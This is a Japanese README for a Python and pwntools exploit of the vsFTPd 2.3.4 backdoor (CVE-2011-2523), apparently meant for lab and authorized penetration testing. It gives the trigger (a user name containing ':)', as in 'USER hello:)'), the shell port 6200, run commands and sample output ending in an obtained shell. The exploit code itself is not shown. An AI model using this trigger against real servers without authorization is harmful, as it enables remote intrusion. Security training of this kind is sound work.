
vsFTPd 2.3.4 のバックドア (CVE-2011-2523) を利用した Python エクスプロイト。細工されたユーザー名を介してポート 6200 に隠しシェルを起動し、許可された侵入テストに対してリモートコマンド実行を可能にします。
このプロジェクトは、vsFTPd 2.3.4 のバックドア脆弱性 (CVE-2011-2523) を Python と pwntools を使用して悪用する方法を示しています。
免責事項: このプロジェクトは教育目的および許可されたペネトレーションテストの目的のみで使用してください。許可なくシステムに対して使用しないでください。
👉 脆弱なバージョンの vsFTPd には、ログイン時に :) を含むユーザー名が使用されるとトリガーされる悪意のあるバックドアが含まれています。
vsFTPd 2.3.4 であるか確認しますUSER hello:)) を送信しますpwntools ライブラリ依存関係をインストール:
pip install pwntools
python3 exploit.py <TARGET_IP>
python3 exploit.py <TARGET_IP> <PORT>
python3 exploit.py 192.168.190.140
[+] Checking FTP Version...
[+] Triggering backdoor...
[+] Connecting to backdoor....
[+] Got Shell
$
ターゲットは vsFTPd 2.3.4 (脆弱なバージョン) を実行している必要があります
ポート 6200 に到達可能である必要があります
以下のようなラボ環境で最も効果的です: